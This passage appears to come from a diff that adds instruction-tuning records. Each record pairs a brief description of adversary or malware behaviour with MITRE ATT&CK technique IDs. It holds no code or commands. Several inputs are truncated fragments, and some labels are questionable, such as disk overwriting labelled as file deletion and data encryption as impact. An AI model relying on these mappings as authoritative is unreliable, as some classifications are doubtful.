descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EXOTIC LILY has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.", + "output": "- T1597: Search Closed Sources" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has purchased credentials and session tokens from criminal underground forums.", + "output": "- T1597.002: Search Closed Sources - Purchase Technical Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has used spearphishing to compromise credentials.", + "output": "- T1598: Phishing for Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.", + "output": "- T1598: Phishing for Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth has been delivered via malicious e-mail attachments.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AADInternals can send phishing emails containing malicious links designed to collect users\u2019 credentials.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SMOKEDHAM has been delivered via malicious links in phishing emails.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sidewinder has sent e-mails with malicious links to credential harvesting websites.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SYNful Knock is malware that is inserted into a network device by patching the operating system image.", + "output": "- T1601.001: Modify System Image - Patch System Image" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BITTER has registered domains to stage payloads.", + "output": "- T1608.001: Stage Capabilities - Upload Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors uploaded commonly available hacker tools to compromised web servers.", + "output": "- T1608.001: Stage Capabilities - Upload Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gamaredon Group has registered domains to stage payloads.", + "output": "- T1608.001: Stage Capabilities - Upload Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.", + "output": "- T1608.002: Stage Capabilities - Upload Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.", + "output": "- T1608.002: Stage Capabilities - Upload Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.", + "output": "- T1608.002: Stage Capabilities - Upload Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.", + "output": "- T1608.004: Stage Capabilities - Drive-by Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.", + "output": "- T1608.004: Stage Capabilities - Drive-by Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites.", + "output": "- T1608.005: Stage Capabilities - Link Target" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kinsing was executed with an Ubuntu container entry point that runs shell scripts.", + "output": "- T1609: Container Administration Command" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Peirates can deploy a pod that mounts its node\u2019s root file system, then execute a command to create a reverse shell on the node.", + "output": "- T1610: Deploy Container" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hildegard has used the BOtB tool that can break out of containers.", + "output": "- T1611: Escape to Host" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.", + "output": "- T1611: Escape to Host" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.", + "output": "- T1614: System Location Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.", + "output": "- T1614.001: System Location Discovery - System Language Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.", + "output": "- T1620: Reflective Code Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ROKRAT can check for debugging tools.", + "output": "- T1622: Debugger Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Saint Bot has used `is_debugger_present` as part of its environmental checks.", + "output": "- T1622: Debugger Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"ThiefQuest uses a function named \"\"is_debugging\"\" to perform anti-debugging logic. The function invokes \"\"sysctl\"\" checking the returned value of \"\"P_TRACED\"\". ThiefQuest also calls \"\"ptrace\"\" with the \"\"PTRACE_DENY_ATTACH\"\" flag to prevent debugging.\"", + "output": "- T1622: Debugger Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET uses the \"\"plutil\"\" command to modify the \"\"LSUIElement\"\", \"\"DFBundleDisplayName\"\", and \"\"CFBundleIdentifier\"\" keys in the \"\"/Contents/Info.plist\"\" file to change how XCSSET is visible on the system.\"", + "output": "- T1647: Plist File Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards", + "output": "- T1204.002: User Execution - Malicious File\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1071: Application Layer Protocol\n- T1132: Data Encoding\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs", + "output": "- T1056: Input Capture\n- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "f) Hadoop YARN ResourceManager \u2013 Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability", + "output": "- T1203: Exploitation for Client Execution\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"\"\"beacon\"\" payload can receive C2 from one protocol and respond on another. This is typically a mixture of HTTP, HTTPS, and DNS traffic.\"", + "output": "- T1026: Multiband Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"2 contains a \"\"Destroy\"\" plug-in that destroys data stored on victim hard drives by overwriting file contents.\"", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "abuses NTFS transactions to launch and conceal malicious processes.", + "output": "- T1055.013: Process Injection - Process Doppelg\u00e4nging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "actors leverage legitimate credentials to log into external remote services.", + "output": "- T1133: External Remote Services\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "actors use nbtscan to discover vulnerable systems.", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "actors use the Hunter tool to conduct network service discovery for vulnerable systems.", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "added junk data to outgoing UDP packets to peer implants.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "adds an entry to the rc.common file for persistence.", + "output": "- T1037.004: Boot or Logon Initialization Scripts - RC Scripts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A Destover-like variant used by uses a batch file mechanism to delete its binaries from the system.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Adversaries can instruct to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares\n- T1078: Valid Accounts\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After collecting files and logs from the victim, encrypts some collected data with Blowfish.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After decrypting itself in memory, downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This \u201cdownloaded\u201d file is actually not dropped onto the system.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After encrypting C2 data, converts it into a hexadecimal representation and then encodes it into base64.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After encrypting log files, the log encryption module in deletes the original, unencrypted files from the host.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After initial compromise, will download a second stage to establish a more permanent presence on the affected system.", + "output": "- T1104: Multi-Stage Channels" 